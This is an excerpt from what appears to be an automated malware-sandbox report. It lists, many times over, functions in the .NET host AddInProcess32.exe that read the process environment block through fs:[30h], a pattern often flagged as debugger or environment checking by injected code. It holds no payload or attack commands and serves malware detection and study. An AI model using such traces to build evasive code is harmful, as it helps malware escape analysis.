              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AEA470 mov eax, dword ptr fs:[00000030h]4_2_01AEA470
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AEA470 mov eax, dword ptr fs:[00000030h]4_2_01AEA470
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B7A456 mov eax, dword ptr fs:[00000030h]4_2_01B7A456
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]4_2_01AFE443
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]4_2_01AFE443
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]4_2_01AFE443
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]4_2_01AFE443
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]4_2_01AFE443
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]4_2_01AFE443
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]4_2_01AFE443
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFE443 mov eax, dword ptr fs:[00000030h]4_2_01AFE443
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE245A mov eax, dword ptr fs:[00000030h]4_2_01AE245A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AB645D mov eax, dword ptr fs:[00000030h]4_2_01AB645D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC07AF mov eax, dword ptr fs:[00000030h]4_2_01AC07AF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B747A0 mov eax, dword ptr fs:[00000030h]4_2_01B747A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6678E mov eax, dword ptr fs:[00000030h]4_2_01B6678E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE27ED mov eax, dword ptr fs:[00000030h]4_2_01AE27ED
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE27ED mov eax, dword ptr fs:[00000030h]4_2_01AE27ED
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE27ED mov eax, dword ptr fs:[00000030h]4_2_01AE27ED
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4E7E1 mov eax, dword ptr fs:[00000030h]4_2_01B4E7E1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC47FB mov eax, dword ptr fs:[00000030h]4_2_01AC47FB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC47FB mov eax, dword ptr fs:[00000030h]4_2_01AC47FB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACC7C0 mov eax, dword ptr fs:[00000030h]4_2_01ACC7C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B407C3 mov eax, dword ptr fs:[00000030h]4_2_01B407C3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3C730 mov eax, dword ptr fs:[00000030h]4_2_01B3C730
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFC720 mov eax, dword ptr fs:[00000030h]4_2_01AFC720
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFC720 mov eax, dword ptr fs:[00000030h]4_2_01AFC720
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF273C mov eax, dword ptr fs:[00000030h]4_2_01AF273C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF273C mov ecx, dword ptr fs:[00000030h]4_2_01AF273C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF273C mov eax, dword ptr fs:[00000030h]4_2_01AF273C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFC700 mov eax, dword ptr fs:[00000030h]4_2_01AFC700
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC0710 mov eax, dword ptr fs:[00000030h]4_2_01AC0710
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF0710 mov eax, dword ptr fs:[00000030h]4_2_01AF0710
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC8770 mov eax, dword ptr fs:[00000030h]4_2_01AC8770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]4_2_01AD0770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]4_2_01AD0770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]4_2_01AD0770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]4_2_01AD0770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]4_2_01AD0770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]4_2_01AD0770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]4_2_01AD0770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]4_2_01AD0770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]4_2_01AD0770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]4_2_01AD0770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]4_2_01AD0770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0770 mov eax, dword ptr fs:[00000030h]4_2_01AD0770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02750 mov eax, dword ptr fs:[00000030h]4_2_01B02750
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02750 mov eax, dword ptr fs:[00000030h]4_2_01B02750
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B44755 mov eax, dword ptr fs:[00000030h]4_2_01B44755
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF674D mov esi, dword ptr fs:[00000030h]4_2_01AF674D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF674D mov eax, dword ptr fs:[00000030h]4_2_01AF674D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF674D mov eax, dword ptr fs:[00000030h]4_2_01AF674D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4E75D mov eax, dword ptr fs:[00000030h]4_2_01B4E75D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC0750 mov eax, dword ptr fs:[00000030h]4_2_01AC0750
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFC6A6 mov eax, dword ptr fs:[00000030h]4_2_01AFC6A6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF66B0 mov eax, dword ptr fs:[00000030h]4_2_01AF66B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC4690 mov eax, dword ptr fs:[00000030h]4_2_01AC4690
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC4690 mov eax, dword ptr fs:[00000030h]4_2_01AC4690
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3E6F2 mov eax, dword ptr fs:[00000030h]4_2_01B3E6F2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3E6F2 mov eax, dword ptr fs:[00000030h]4_2_01B3E6F2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3E6F2 mov eax, dword ptr fs:[00000030h]4_2_01B3E6F2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3E6F2 mov eax, dword ptr fs:[00000030h]4_2_01B3E6F2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B406F1 mov eax, dword ptr fs:[00000030h]4_2_01B406F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B406F1 mov eax, dword ptr fs:[00000030h]4_2_01B406F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFA6C7 mov ebx, dword ptr fs:[00000030h]4_2_01AFA6C7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFA6C7 mov eax, dword ptr fs:[00000030h]4_2_01AFA6C7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC262C mov eax, dword ptr fs:[00000030h]4_2_01AC262C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ADE627 mov eax, dword ptr fs:[00000030h]4_2_01ADE627
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF6620 mov eax, dword ptr fs:[00000030h]4_2_01AF6620
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF8620 mov eax, dword ptr fs:[00000030h]4_2_01AF8620
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD260B mov eax, dword ptr fs:[00000030h]4_2_01AD260B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD260B mov eax, dword ptr fs:[00000030h]4_2_01AD260B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD260B mov eax, dword ptr fs:[00000030h]4_2_01AD260B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD260B mov eax, dword ptr fs:[00000030h]4_2_01AD260B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD260B mov eax, dword ptr fs:[00000030h]4_2_01AD260B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD260B mov eax, dword ptr fs:[00000030h]4_2_01AD260B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD260B mov eax, dword ptr fs:[00000030h]4_2_01AD260B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02619 mov eax, dword ptr fs:[00000030h]4_2_01B02619
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3E609 mov eax, dword ptr fs:[00000030h]4_2_01B3E609
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFA660 mov eax, dword ptr fs:[00000030h]4_2_01AFA660
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFA660 mov eax, dword ptr fs:[00000030h]4_2_01AFA660
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8866E mov eax, dword ptr fs:[00000030h]4_2_01B8866E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8866E mov eax, dword ptr fs:[00000030h]4_2_01B8866E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF2674 mov eax, dword ptr fs:[00000030h]4_2_01AF2674
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ADC640 mov eax, dword ptr fs:[00000030h]4_2_01ADC640
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC09AD mov eax, dword ptr fs:[00000030h]4_2_01AC09AD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC09AD mov eax, dword ptr fs:[00000030h]4_2_01AC09AD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B489B3 mov esi, dword ptr fs:[00000030h]4_2_01B489B3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B489B3 mov eax, dword ptr fs:[00000030h]4_2_01B489B3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B489B3 mov eax, dword ptr fs:[00000030h]4_2_01B489B3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]4_2_01AD29A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]4_2_01AD29A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]4_2_01AD29A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]4_2_01AD29A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]4_2_01AD29A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]4_2_01AD29A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]4_2_01AD29A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]4_2_01AD29A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]4_2_01AD29A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]4_2_01AD29A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]4_2_01AD29A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]4_2_01AD29A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD29A0 mov eax, dword ptr fs:[00000030h]4_2_01AD29A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4E9E0 mov eax, dword ptr fs:[00000030h]4_2_01B4E9E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF29F9 mov eax, dword ptr fs:[00000030h]4_2_01AF29F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF29F9 mov eax, dword ptr fs:[00000030h]4_2_01AF29F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8A9D3 mov eax, dword ptr fs:[00000030h]4_2_01B8A9D3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B569C0 mov eax, dword ptr fs:[00000030h]4_2_01B569C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACA9D0 mov eax, dword ptr fs:[00000030h]4_2_01ACA9D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACA9D0 mov eax, dword ptr fs:[00000030h]4_2_01ACA9D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACA9D0 mov eax, dword ptr fs:[00000030h]4_2_01ACA9D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACA9D0 mov eax, dword ptr fs:[00000030h]4_2_01ACA9D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACA9D0 mov eax, dword ptr fs:[00000030h]4_2_01ACA9D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACA9D0 mov eax, dword ptr fs:[00000030h]4_2_01ACA9D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF49D0 mov eax, dword ptr fs:[00000030h]4_2_01AF49D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4892A mov eax, dword ptr fs:[00000030h]4_2_01B4892A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B5892B mov eax, dword ptr fs:[00000030h]4_2_01B5892B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4C912 mov eax, dword ptr fs:[00000030h]4_2_01B4C912
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AB8918 mov eax, dword ptr fs:[00000030h]4_2_01AB8918
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AB8918 mov eax, dword ptr fs:[00000030h]4_2_01AB8918
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3E908 mov eax, dword ptr fs:[00000030h]4_2_01B3E908
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3E908 mov eax, dword ptr fs:[00000030h]4_2_01B3E908
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4C97C mov eax, dword ptr fs:[00000030h]4_2_01B4C97C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE6962 mov eax, dword ptr fs:[00000030h]4_2_01AE6962
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE6962 mov eax, dword ptr fs:[00000030h]4_2_01AE6962
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE6962 mov eax, dword ptr fs:[00000030h]4_2_01AE6962
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B64978 mov eax, dword ptr fs:[00000030h]4_2_01B64978
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B64978 mov eax, dword ptr fs:[00000030h]4_2_01B64978
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B0096E mov eax, dword ptr fs:[00000030h]4_2_01B0096E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B0096E mov edx, dword ptr fs:[00000030h]4_2_01B0096E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B0096E mov eax, dword ptr fs:[00000030h]4_2_01B0096E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B40946 mov eax, dword ptr fs:[00000030h]4_2_01B40946
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4C89D mov eax, dword ptr fs:[00000030h]4_2_01B4C89D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC0887 mov eax, dword ptr fs:[00000030h]4_2_01AC0887
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFC8F9 mov eax, dword ptr fs:[00000030h]4_2_01AFC8F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFC8F9 mov eax, dword ptr fs:[00000030h]4_2_01AFC8F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8A8E4 mov eax, dword ptr fs:[00000030h]4_2_01B8A8E4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AEE8C0 mov eax, dword ptr fs:[00000030h]4_2_01AEE8C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6483A mov eax, dword ptr fs:[00000030h]4_2_01B6483A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6483A mov eax, dword ptr fs:[00000030h]4_2_01B6483A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE2835 mov eax, dword ptr fs:[00000030h]4_2_01AE2835
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE2835 mov eax, dword ptr fs:[00000030h]4_2_01AE2835
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE2835 mov eax, dword ptr fs:[00000030h]4_2_01AE2835
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE2835 mov ecx, dword ptr fs:[00000030h]4_2_01AE2835
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE2835 mov eax, dword ptr fs:[00000030h]4_2_01AE2835
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE2835 mov eax, dword ptr fs:[00000030h]4_2_01AE2835
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFA830 mov eax, dword ptr fs:[00000030h]4_2_01AFA830
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4C810 mov eax, dword ptr fs:[00000030h]4_2_01B4C810
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B56870 mov eax, dword ptr fs:[00000030h]4_2_01B56870
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B56870 mov eax, dword ptr fs:[00000030h]4_2_01B56870
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4E872 mov eax, dword ptr fs:[00000030h]4_2_01B4E872
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4E872 mov eax, dword ptr fs:[00000030h]4_2_01B4E872
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD2840 mov ecx, dword ptr fs:[00000030h]4_2_01AD2840
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC4859 mov eax, dword ptr fs:[00000030h]4_2_01AC4859
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC4859 mov eax, dword ptr fs:[00000030h]4_2_01AC4859
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF0854 mov eax, dword ptr fs:[00000030h]4_2_01AF0854
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B74BB0 mov eax, dword ptr fs:[00000030h]4_2_01B74BB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B74BB0 mov eax, dword ptr fs:[00000030h]4_2_01B74BB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0BBE mov eax, dword ptr fs:[00000030h]4_2_01AD0BBE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0BBE mov eax, dword ptr fs:[00000030h]4_2_01AD0BBE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4CBF0 mov eax, dword ptr fs:[00000030h]4_2_01B4CBF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AEEBFC mov eax, dword ptr fs:[00000030h]4_2_01AEEBFC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC8BF0 mov eax, dword ptr fs:[00000030h]4_2_01AC8BF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC8BF0 mov eax, dword ptr fs:[00000030h]4_2_01AC8BF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC8BF0 mov eax, dword ptr fs:[00000030h]4_2_01AC8BF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC0BCD mov eax, dword ptr fs:[00000030h]4_2_01AC0BCD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC0BCD mov eax, dword ptr fs:[00000030h]4_2_01AC0BCD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC0BCD mov eax, dword ptr fs:[00000030h]4_2_01AC0BCD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE0BCB mov eax, dword ptr fs:[00000030h]4_2_01AE0BCB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE0BCB mov eax, dword ptr fs:[00000030h]4_2_01AE0BCB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE0BCB mov eax, dword ptr fs:[00000030h]4_2_01AE0BCB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6EBD0 mov eax, dword ptr fs:[00000030h]4_2_01B6EBD0
